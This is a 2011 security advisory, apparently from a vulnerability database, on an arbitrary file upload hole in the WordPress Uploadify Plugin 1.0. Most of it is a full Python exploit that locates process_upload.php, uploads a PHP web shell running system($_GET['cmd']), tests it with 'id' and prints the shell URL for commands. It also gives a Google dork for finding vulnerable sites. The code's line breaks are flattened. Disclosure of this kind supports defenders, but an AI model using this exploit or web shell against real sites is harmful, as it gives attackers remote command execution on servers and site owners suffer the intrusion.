WordPress Uploadify Plugin 1.0 Remote File Upload

Type securityvulns
Reporter Securityvulns
Modified 2011-02-24T00:00:00


GotGeek Labs http://www.gotgeek.com.br/

WordPress Uploadify Plugin 1.0 Remote File Upload

[+] Description

Adds a shortcode to embed the necessary elements to use Uploadify in a page or post which will give your website visitors the ability to upload large files. By default the files will be uploaded to the folder set in your preferences. The shortcode supports most of the Uploadify options, so it can be easily customized to suit your needs.

[+] Information

Title: WordPress Uploadify Plugin 1.0 Remote File Upload Google Dork: inurl:"/wp-content/plugins/uploadify/" Advisory: gg-003-2011 Date: 02-18-2011 Last update: 02-21-2011 Link: http://www.gotgeek.com.br/pocs/gg-003-2011.txt Tested on: CentOS 5.5 + WordPress 3.0.5

[+] Vulnerability

Uploadify Plugin is prone to a vulnerability that lets attackers upload arbitrary files. Successful exploitation of the vulnerability allows an attacker to upload a php code for example and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation.

Affected Versions: WordPress Uploadify Plugin 1.0

[+] Proof of Concept/Exploit


import httplib import socket import sys, time

plugin = "/wp-content/plugins/uploadify/includes/" shell = """ <?php system($_GET['cmd']); ?> """

def banner(): print "\n[] gotgeek labs" print "[] http://gotgeek.com.br\n"

if len(sys.argv) < 4: banner() print "[?] Usage: " + sys.argv[0] + " <target> <dir> <port>" print "[?] Example: uploadify.py www.example.com /wordpress 80\n\n" sys.exit(1)

target = sys.argv[1] dir = sys.argv[2] port = sys.argv[3]

def checkurl(): try: print "[*] Looking for vulnerable file..." conn = httplib.HTTPConnection(target+":"+port) conn.request("GET", dir + plugin + "process_upload.php") r1 = conn.getresponse() if r1.status == 200: print "[+] Found!\n" else: print "[-] NOT Found!\n\n" sys.exit(1) except socket.error, msg: print "[-] Can't connect!\n\n" sys.exit(1)

def uploadshell(): print "[*] Uploading shell..." params = ("\r\n" "------gg\r\n" 'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n' "Content-Type: application/octet-stream\r\n" "\r\n") params+= shell + "\r\n" params+= ("------gg--\r\n" "\r\n") headers = {'User-Agent': 'gotgeek', 'Content-Type': 'multipart/form-data; boundary=----gg'} conn = httplib.HTTPConnection(target+":"+port) conn.request("POST", dir + plugin + "process_upload.php?folder=./", params, headers) time.sleep(3)

def checkshell(): print "[*] Checking shell.php..." conn = httplib.HTTPConnection(target+":"+port) conn.request("GET", dir + plugin + "shell.php") r2 = conn.getresponse() if r2.status == 200: print "[+] Shell Uploaded!\n" conn.request("GET", dir + plugin + "shell.php?cmd=id") r3 = conn.getresponse() id = r3.read() print "[+] id: " + id print "[+] shell: http://" + target + dir + plugin + "shell.php?cmd=[command]\n\n" conn.close() else: print "[-] NOT Uploaded!\n\n" sys.exit(1)

def main(): banner() checkurl() uploadshell() checkshell()

if name == "main": main()

[+] References

http://wordpress.org/extend/plugins/uploadify/ http://wordpress.org/extend/plugins/uploadify/stats/

[+] Credits